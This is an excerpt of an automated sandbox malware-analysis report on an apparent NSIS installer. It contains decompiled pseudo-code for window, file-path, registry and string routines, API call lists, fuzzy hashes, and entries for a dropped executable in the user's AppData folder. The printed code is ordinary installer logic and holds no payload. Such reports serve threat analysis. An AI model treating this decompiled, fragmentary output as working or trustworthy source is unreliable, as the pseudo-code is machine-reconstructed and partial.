						}
						return _t2;
					} else {
						return E00406946(0);
					}
				} else {
					_t6 =  *0x42aa20; // 0x0
					if(_t6 != 0) {
						_t6 = DestroyWindow(_t6);
					}
					 *0x42aa20 = 0;
					return _t6;
				}
			}






                            0x00403020
                            0x0040303a
                            0x00403040
                            0x0040304a
                            0x00403050
                            0x00403056
                            0x00403067
                            0x00403070
                            0x00000000
                            0x00403075
                            0x0040307c
                            0x00403042
                            0x00403049
                            0x00403049
                            0x00403022
                            0x00403022
                            0x00403029
                            0x0040302c
                            0x0040302c
                            0x00403032
                            0x00403039
                            0x00403039

                            APIs
                            • DestroyWindow.USER32(00000000,00000000,004031F7,00000001,?,?,?,?,?,0040387D,?), ref: 0040302C
                            • GetTickCount.KERNEL32 ref: 0040304A
                            • CreateDialogParamW.USER32 ref: 00403067
                            • ShowWindow.USER32(00000000,00000005,?,?,?,?,?,0040387D,?), ref: 00403075
                            Memory Dump Source
                            • Source File: 00000001.00000002.225025140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.225012224.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225062362.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225071599.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225077053.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225106103.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225114682.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225119800.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Install.jbxd
                            Similarity
                            • API ID: Window$CountCreateDestroyDialogParamShowTick
                            • String ID:
                            • API String ID: 2102729457-0
                            • Opcode ID: a982ea5e0a4ecb993fc2e9b794e4afe077943b4b771bcbca33e5c7758572dd30
                            • Instruction ID: 3364d2369d767f53e7c05e99e54cbc9c067443d5da9c9f227d7c3a258cba7bb7
                            • Opcode Fuzzy Hash: a982ea5e0a4ecb993fc2e9b794e4afe077943b4b771bcbca33e5c7758572dd30
                            • Instruction Fuzzy Hash: A9F08270702A20AFC2316F50FE4998B7F68FB44B56741447AF446B15ACCB380DA2CB9D
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00405F14 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47stringCOMMON
                            Download Yara Rule
                            C-Code - Quality: 53%
                            			E00405F14(void* __eflags, intOrPtr _a4) {
				int _t11;
				signed char* _t12;
				intOrPtr _t18;
				intOrPtr* _t21;
				signed int _t23;

				E0040653D(0x42fa70, _a4);
				_t21 = E00405EB7(0x42fa70);
				if(_t21 != 0) {
					E004067C4(_t21);
					if(( *0x434f18 & 0x00000080) == 0) {
						L5:
						_t23 = _t21 - 0x42fa70 >> 1;
						while(1) {
							_t11 = lstrlenW(0x42fa70);
							_push(0x42fa70);
							if(_t11 <= _t23) {
								break;
							}
							_t12 = E00406873();
							if(_t12 == 0 || ( *_t12 & 0x00000010) != 0) {
								E00405E58(0x42fa70);
								continue;
							} else {
								goto L1;
							}
						}
						E00405E0C();
						return 0 | GetFileAttributesW(??) != 0xffffffff;
					}
					_t18 =  *_t21;
					if(_t18 == 0 || _t18 == 0x5c) {
						goto L1;
					} else {
						goto L5;
					}
				}
				L1:
				return 0;
			}








                            0x00405f20
                            0x00405f2b
                            0x00405f2f
                            0x00405f36
                            0x00405f42
                            0x00405f52
                            0x00405f54
                            0x00405f6c
                            0x00405f6d
                            0x00405f74
                            0x00405f75
                            0x00000000
                            0x00000000
                            0x00405f58
                            0x00405f5f
                            0x00405f67
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00405f5f
                            0x00405f77
                            0x00000000
                            0x00405f8b
                            0x00405f44
                            0x00405f4a
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00405f4a
                            0x00405f31
                            0x00000000

                            APIs
                              • Part of subcall function 0040653D: lstrcpynW.KERNEL32(?,?,00000400,0040369D,00433F00,NSIS Error), ref: 0040654A
                              • Part of subcall function 00405EB7: CharNextW.USER32(?,?,0042FA70,?,00405F2B,0042FA70,0042FA70,76CDFAA0,?,C:\Users\user\AppData\Local\Temp\,00405C69,?,76CDFAA0,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405EC5
                              • Part of subcall function 00405EB7: CharNextW.USER32(00000000), ref: 00405ECA
                              • Part of subcall function 00405EB7: CharNextW.USER32(00000000), ref: 00405EE2
                            • lstrlenW.KERNEL32(0042FA70,00000000,0042FA70,0042FA70,76CDFAA0,?,C:\Users\user\AppData\Local\Temp\,00405C69,?,76CDFAA0,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405F6D
                            • GetFileAttributesW.KERNEL32(0042FA70,0042FA70,0042FA70,0042FA70,0042FA70,0042FA70,00000000,0042FA70,0042FA70,76CDFAA0,?,C:\Users\user\AppData\Local\Temp\,00405C69,?,76CDFAA0,C:\Users\user\AppData\Local\Temp\), ref: 00405F7D
                            Strings
                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00405F14
                            Memory Dump Source
                            • Source File: 00000001.00000002.225025140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.225012224.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225062362.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225071599.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225077053.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225106103.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225114682.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225119800.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Install.jbxd
                            Similarity
                            • API ID: CharNext$AttributesFilelstrcpynlstrlen
                            • String ID: C:\Users\user\AppData\Local\Temp\
                            • API String ID: 3248276644-3081826266
                            • Opcode ID: 442e1b1d96b1c23b6c0207761c3788c7dd97485575ed4e88a223653099446a7a
                            • Instruction ID: e20fb510edeaf32ba19235dad054e15b0ffac27cf679254cac4fdbc394554759
                            • Opcode Fuzzy Hash: 442e1b1d96b1c23b6c0207761c3788c7dd97485575ed4e88a223653099446a7a
                            • Instruction Fuzzy Hash: E3F0F426119D6226DB22333A5C05EAF0554CE9276475A023BF895B12C5DB3C8A43D8AE
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00405513 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON
                            Download Yara Rule
                            C-Code - Quality: 89%
                            			E00405513(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				int _t15;
				long _t16;

				_t15 = _a8;
				if(_t15 != 0x102) {
					if(_t15 != 0x200) {
						_t16 = _a16;
						L7:
						if(_t15 == 0x419 &&  *0x42d254 != _t16) {
							_push(_t16);
							_push(6);
							 *0x42d254 = _t16;
							E00404ED4();
						}
						L11:
						return CallWindowProcW( *0x42d25c, _a4, _t15, _a12, _t16);
					}
					if(IsWindowVisible(_a4) == 0) {
						L10:
						_t16 = _a16;
						goto L11;
					}
					_t16 = E00404E54(_a4, 1);
					_t15 = 0x419;
					goto L7;
				}
				if(_a12 != 0x20) {
					goto L10;
				}
				E004044E5(0x413);
				return 0;
			}





                            0x00405517
                            0x00405521
                            0x0040553d
                            0x0040555f
                            0x00405562
                            0x00405568
                            0x00405572
                            0x00405573
                            0x00405575
                            0x0040557b
                            0x0040557b
                            0x00405585
                            0x00000000
                            0x00405593
                            0x0040554a
                            0x00405582
                            0x00405582
                            0x00000000
                            0x00405582
                            0x00405556
                            0x00405558
                            0x00000000
                            0x00405558
                            0x00405527
                            0x00000000
                            0x00000000
                            0x0040552e
                            0x00000000

                            APIs
                            • IsWindowVisible.USER32(?), ref: 00405542
                            • CallWindowProcW.USER32(?,?,?,?), ref: 00405593
                              • Part of subcall function 004044E5: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004044F7
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.225025140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.225012224.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225062362.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225071599.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225077053.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225106103.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225114682.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225119800.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Install.jbxd
                            Similarity
                            • API ID: Window$CallMessageProcSendVisible
                            • String ID:
                            • API String ID: 3748168415-3916222277
                            • Opcode ID: 0dea828d0dd479423763887dac230e90f27d8b8ae518018479b0ad82d517bb95
                            • Instruction ID: 904a7c61355239921aaa7855b64c86422fca6e8886f64d9e6fcbc6a993ea73ec
                            • Opcode Fuzzy Hash: 0dea828d0dd479423763887dac230e90f27d8b8ae518018479b0ad82d517bb95
                            • Instruction Fuzzy Hash: F3017CB1100608BFDF209F11DD80AAB3B27EB84754F50453AFA01762D5D77A8E92DA69
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0040640B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44registryCOMMON
                            Download Yara Rule
                            C-Code - Quality: 90%
                            			E0040640B(void* __ecx, void* __eflags, intOrPtr _a4, int _a8, short* _a12, char* _a16, signed int _a20) {
				int _v8;
				long _t21;
				long _t24;
				char* _t30;

				asm("sbb eax, eax");
				_v8 = 0x800;
				_t21 = E004063AA(__eflags, _a4, _a8,  ~_a20 & 0x00000100 | 0x00020019,  &_a20);
				_t30 = _a16;
				if(_t21 != 0) {
					L4:
					 *_t30 =  *_t30 & 0x00000000;
				} else {
					_t24 = RegQueryValueExW(_a20, _a12, 0,  &_a8, _t30,  &_v8);
					_t21 = RegCloseKey(_a20);
					_t30[0x7fe] = _t30[0x7fe] & 0x00000000;
					if(_t24 != 0 || _a8 != 1 && _a8 != 2) {
						goto L4;
					}
				}
				return _t21;
			}







                            0x00406419
                            0x0040641b
                            0x00406433
                            0x00406438
                            0x0040643d
                            0x0040647b
                            0x0040647b
                            0x0040643f
                            0x00406451
                            0x0040645c
                            0x00406462
                            0x0040646d
                            0x00000000
                            0x00000000
                            0x0040646d
                            0x00406481

                            APIs
                            • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000800,00000000,0042C248,00000000,?,?,C:\Users\user\AppData\Roaming\34432.exe,?,?,00406672,80000002), ref: 00406451
                            • RegCloseKey.ADVAPI32(?,?,00406672,80000002,Software\Microsoft\Windows\CurrentVersion,C:\Users\user\AppData\Roaming\34432.exe,C:\Users\user\AppData\Roaming\34432.exe,C:\Users\user\AppData\Roaming\34432.exe,00000000,0042C248), ref: 0040645C
                            Strings
                            • C:\Users\user\AppData\Roaming\34432.exe, xrefs: 00406412
                            Memory Dump Source
                            • Source File: 00000001.00000002.225025140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.225012224.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225062362.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225071599.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225077053.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225106103.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225114682.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225119800.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Install.jbxd
                            Similarity
                            • API ID: CloseQueryValue
                            • String ID: C:\Users\user\AppData\Roaming\34432.exe
                            • API String ID: 3356406503-1124846496
                            • Opcode ID: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                            • Instruction ID: a8d415a3dc4e4479eaaa65942f717852bb8bd3539c12dad3b2e52d491ce509ba
                            • Opcode Fuzzy Hash: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                            • Instruction Fuzzy Hash: FB017C72510209AADF21CF51CC09EDB3BB8FB54364F01803AFD5AA6190D738D968DBA8
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00403B57 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E00403B57() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t8;

				_t8 =  *0x42b22c;
				_t3 = E00403B3C(_t2, 0);
				if(_t8 != 0) {
					do {
						_t6 = _t8;
						_t8 =  *_t8;
						FreeLibrary( *(_t6 + 8));
						_t3 = GlobalFree(_t6);
					} while (_t8 != 0);
				}
				 *0x42b22c =  *0x42b22c & 0x00000000;
				return _t3;
			}







                            0x00403b58
                            0x00403b60
                            0x00403b67
                            0x00403b6a
                            0x00403b6a
                            0x00403b6c
                            0x00403b71
                            0x00403b78
                            0x00403b7e
                            0x00403b82
                            0x00403b83
                            0x00403b8b

                            APIs
                            • FreeLibrary.KERNEL32(?,76CDFAA0,00000000,C:\Users\user\AppData\Local\Temp\,00403B2F,00403A5E,?), ref: 00403B71
                            • GlobalFree.KERNEL32 ref: 00403B78
                            Strings
                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00403B57
                            Memory Dump Source
                            • Source File: 00000001.00000002.225025140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.225012224.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225062362.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225071599.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225077053.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225106103.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225114682.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225119800.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Install.jbxd
                            Similarity
                            • API ID: Free$GlobalLibrary
                            • String ID: C:\Users\user\AppData\Local\Temp\
                            • API String ID: 1100898210-3081826266
                            • Opcode ID: 14d9b0f9b7ecca22f0083886da8930ddd6c03ed0d6fdc94ff3a28603f1b7b4ab
                            • Instruction ID: 19c5699a9bb8b3376c06320bd1355d3f7d45777e2bc9a3354ca833756e7661a4
                            • Opcode Fuzzy Hash: 14d9b0f9b7ecca22f0083886da8930ddd6c03ed0d6fdc94ff3a28603f1b7b4ab
                            • Instruction Fuzzy Hash: 40E0EC3290212097C7615F55FE08B6E7B78AF49B26F05056AE884BB2628B746D428BDC
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00405F92 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E00405F92(void* __ecx, CHAR* _a4, CHAR* _a8) {
				int _v8;
				int _t12;
				int _t14;
				int _t15;
				CHAR* _t17;
				CHAR* _t27;

				_t12 = lstrlenA(_a8);
				_t27 = _a4;
				_v8 = _t12;
				while(lstrlenA(_t27) >= _v8) {
					_t14 = _v8;
					 *(_t14 + _t27) =  *(_t14 + _t27) & 0x00000000;
					_t15 = lstrcmpiA(_t27, _a8);
					_t27[_v8] =  *(_t14 + _t27);
					if(_t15 == 0) {
						_t17 = _t27;
					} else {
						_t27 = CharNextA(_t27);
						continue;
					}
					L5:
					return _t17;
				}
				_t17 = 0;
				goto L5;
			}









                            0x00405fa2
                            0x00405fa4
                            0x00405fa7
                            0x00405fd3
                            0x00405fac
                            0x00405fb5
                            0x00405fba
                            0x00405fc5
                            0x00405fc8
                            0x00405fe4
                            0x00405fca
                            0x00405fd1
                            0x00000000
                            0x00405fd1
                            0x00405fdd
                            0x00405fe1
                            0x00405fe1
                            0x00405fdb
                            0x00000000

                            APIs
                            • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406277,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FA2
                            • lstrcmpiA.KERNEL32(00000000,00000000,?,00000000,00406277,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FBA
                            • CharNextA.USER32(00000000,?,00000000,00406277,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FCB
                            • lstrlenA.KERNEL32(00000000,?,00000000,00406277,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FD4
                            Memory Dump Source
                            • Source File: 00000001.00000002.225025140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.225012224.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225062362.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225071599.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225077053.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225106103.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225114682.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.225119800.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Install.jbxd
                            Similarity
                            • API ID: lstrlen$CharNextlstrcmpi
                            • String ID:
                            • API String ID: 190613189-0
                            • Opcode ID: 21d608d80335ac136f0ceeda94a64e737efc7ffd0529c55eb96d3cb5f29812e9
                            • Instruction ID: bd09551308ad338638525116890fdadd4ab1f465f5503068af61de479685a4e4
                            • Opcode Fuzzy Hash: 21d608d80335ac136f0ceeda94a64e737efc7ffd0529c55eb96d3cb5f29812e9
                            • Instruction Fuzzy Hash: 34F0C231604418FFC7029BA5CD0099EBBA8EF06250B2140AAF840FB210D678DE019BA9
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Executed Functions

                            Function 00007FFF7E401CCC Relevance: .1, Instructions: 120COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000004.00000002.374556125.00007FFF7E400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7E400000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_7fff7e400000_34432.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: cbc34f93633c4adc465ab4fe1366098ee982aaad0d16ae6d0392597ddb45bee3
                            • Instruction ID: 3395399c912543d30720f61d79a053f54571deb984c85d02489e3222c72b5a83
                            • Opcode Fuzzy Hash: cbc34f93633c4adc465ab4fe1366098ee982aaad0d16ae6d0392597ddb45bee3
                            • Instruction Fuzzy Hash: 8B31292560D7890FD31BAA348855562BFA5EF87210B1582FFD0D6CB5E7DD285807C392
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00007FFF7E401C9B Relevance: .1, Instructions: 116COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000004.00000002.374556125.00007FFF7E400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7E400000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_7fff7e400000_34432.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 95d1777218f68f286567c119feed10924efd7df0decd301de1e4c346b3486899
                            • Instruction ID: be8af5848816afce7f2b33570489f305e260eff55a15dd5c622a36e59822dc5e
                            • Opcode Fuzzy Hash: 95d1777218f68f286567c119feed10924efd7df0decd301de1e4c346b3486899
                            • Instruction Fuzzy Hash: 3E31262250D7890FD31B9A348C695627FA6DB87210B1A82FFD4C6CB1A7D8286C07C392
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00007FFF7E401D60 Relevance: .1, Instructions: 93COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000004.00000002.374556125.00007FFF7E400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7E400000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_7fff7e400000_34432.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: a2ce7a29c480d311bc3d79a731ed87f1839b566c06709d88ef1e0c6f2a774a66
                            • Instruction ID: 4f70370fdd8d496d7766debfdc6587cdd648079e1fc269bab427ef9f57ffc783
                            • Opcode Fuzzy Hash: a2ce7a29c480d311bc3d79a731ed87f1839b566c06709d88ef1e0c6f2a774a66
                            • Instruction Fuzzy Hash: 12210B2660D6C51FD31B9A398C69462BFAADBC711071A82EFD4C6CB5E3DD285807C392
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00007FFF7E408CF5 Relevance: 1.3, Strings: 1, Instructions: 50COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000004.00000002.374556125.00007FFF7E400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7E400000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_7fff7e400000_34432.jbxd
                            Similarity
                            • API ID:
                            • String ID: 0^RU
                            • API String ID: 0-616677034
                            • Opcode ID: 924df49e2792c6e3243180452764e3c1cb9d9918a2a9188dfded39f21c5f26b2
                            • Instruction ID: f402d992327036c44d8256bcf3e9977c58f6e6120c73c0c69e599db38d537302
                            • Opcode Fuzzy Hash: 924df49e2792c6e3243180452764e3c1cb9d9918a2a9188dfded39f21c5f26b2
                            • Instruction Fuzzy Hash: 8C018F30B5890D8FCB4CEB1CC455EADB3E2EF59710B0442A9D40AC72A1DE24EC5287C0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00007FFF7E406B7B Relevance: 1.3, Strings: 1, Instructions: 41COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000004.00000002.374556125.00007FFF7E400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7E400000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_7fff7e400000_34432.jbxd
                            Similarity
                            • API ID:
                            • String ID: py.~
                            • API String ID: 0-2917235016
                            • Opcode ID: abdb8b6eca5339955b9173f7a722343a8609ee35d5a46ee5ecb23c8efe0b65ba
                            • Instruction ID: f9821d45064052cf356943ede9ec64c9aa4017bb009651321f83a40084de35da
                            • Opcode Fuzzy Hash: abdb8b6eca5339955b9173f7a722343a8609ee35d5a46ee5ecb23c8efe0b65ba
                            • Instruction Fuzzy Hash: 60F0F03671841A0BE78CFA6C80AA2FD62C2EF85300B5001BFE40BCB3D7DC2CA8120395
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00007FFF7E406E53 Relevance: 1.3, Strings: 1, Instructions: 28COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000004.00000002.374556125.00007FFF7E400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7E400000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_7fff7e400000_34432.jbxd
                            Similarity
                            • API ID:
                            • String ID: Xz.~
                            • API String ID: 0-3391176896
                            • Opcode ID: 1f6300bdaa702e9e8590f481d5ad9529e3b56cbbe8690c6eb591ff010ad524e8
                            • Instruction ID: 3ee200a853699a73e7831a2399d8d35456a7cbe3a858f9309c368f0427d3233d
                            • Opcode Fuzzy Hash: 1f6300bdaa702e9e8590f481d5ad9529e3b56cbbe8690c6eb591ff010ad524e8
                            • Instruction Fuzzy Hash: 3AF01434A049198FDBE4EB28D495B6873E2EB59311F5441D9900DD7656CA349D868B40
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00007FFF7E406F56 Relevance: 1.3, Strings: 1, Instructions: 21COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000004.00000002.374556125.00007FFF7E400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7E400000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_7fff7e400000_34432.jbxd
                            Similarity
                            • API ID:
                            • String ID: Xz.~
                            • API String ID: 0-3391176896
                            • Opcode ID: 23de654445ea5f2c7ad9e8e79e09522b007acb104ca2081fcdafcb565b2870ce
                            • Instruction ID: 6b5d6a3e891e4e093b81f70834e4f97b42a25005af45b891594f960fed66963e
                            • Opcode Fuzzy Hash: 23de654445ea5f2c7ad9e8e79e09522b007acb104ca2081fcdafcb565b2870ce
                            • Instruction Fuzzy Hash: 49D05E01B18A0F0BD4586B5C305917863D2FBC8211E90017AE40ED37C3DC1A6C43024A
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00007FFF7E401182 Relevance: 1.3, Strings: 1, Instructions: 16COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000004.00000002.374556125.00007FFF7E400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7E400000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_7fff7e400000_34432.jbxd
                            Similarity
                            • API ID:
                            • String ID: `W.~
                            • API String ID: 0-3475719485
                            • Opcode ID: 2626cca4b7d137d494568b232ff6a5f4924d705b4b02890ec9f628200d7ba809
                            • Instruction ID: f9f04d1fc2cba07feabf6a3bf4dcf5aeb6b60ad2448795eac2a8e3f8d3aae39e
                            • Opcode Fuzzy Hash: 2626cca4b7d137d494568b232ff6a5f4924d705b4b02890ec9f628200d7ba809
                            • Instruction Fuzzy Hash: 7AD01205714A0D4A9694BA2C51D86E9A3C1EB58255780157B944BC3993DD59B4470780
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00007FFF7E404ED8 Relevance: 1.3, Strings: 1, Instructions: 6COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000004.00000002.374556125.00007FFF7E400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7E400000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_7fff7e400000_34432.jbxd
                            Similarity
                            • API ID:
                            • String ID: #6^_^
                            • API String ID: 0-3410500413
                            • Opcode ID: 99d74f04fbea49d1f56d4c40b2058768555da7ebafa3ec1a988860f702233b99
                            • Instruction ID: 022a1151f057f3a61f362c48d864c46a1428d091c2b59645e8d8963018bb39fd
                            • Opcode Fuzzy Hash: 99d74f04fbea49d1f56d4c40b2058768555da7ebafa3ec1a988860f702233b99
                            • Instruction Fuzzy Hash: EFA012112348060A32C87654001823900C2AB94050B204436540EC328ADC14C8030101
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00007FFF7E406BE7 Relevance: 1.3, Strings: 1, Instructions: 6COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000004.00000002.374556125.00007FFF7E400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7E400000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_7fff7e400000_34432.jbxd
                            Similarity
                            • API ID:
                            • String ID: @{.~
                            • API String ID: 0-1582192007
                            • Opcode ID: e068bfbd7b3f1f2f23dc5d96689fa9e373e1d8cf32405d0443821bc7204a5899
                            • Instruction ID: 342fa6a8328d3ca6b3d25310f4da3a4d53b2eb3ffdeb3ee0825fe400e404311a
                            • Opcode Fuzzy Hash: e068bfbd7b3f1f2f23dc5d96689fa9e373e1d8cf32405d0443821bc7204a5899
                            • Instruction Fuzzy Hash: D7A01210A0041807E1547514802C37440C19754300F4101B9440AC21C1EC080C120202
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00007FFF7E404FD2 Relevance: 1.3, Strings: 1, Instructions: 6COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000004.00000002.374556125.00007FFF7E400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7E400000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_7fff7e400000_34432.jbxd
                            Similarity
                            • API ID:
                            • String ID: 5^_^
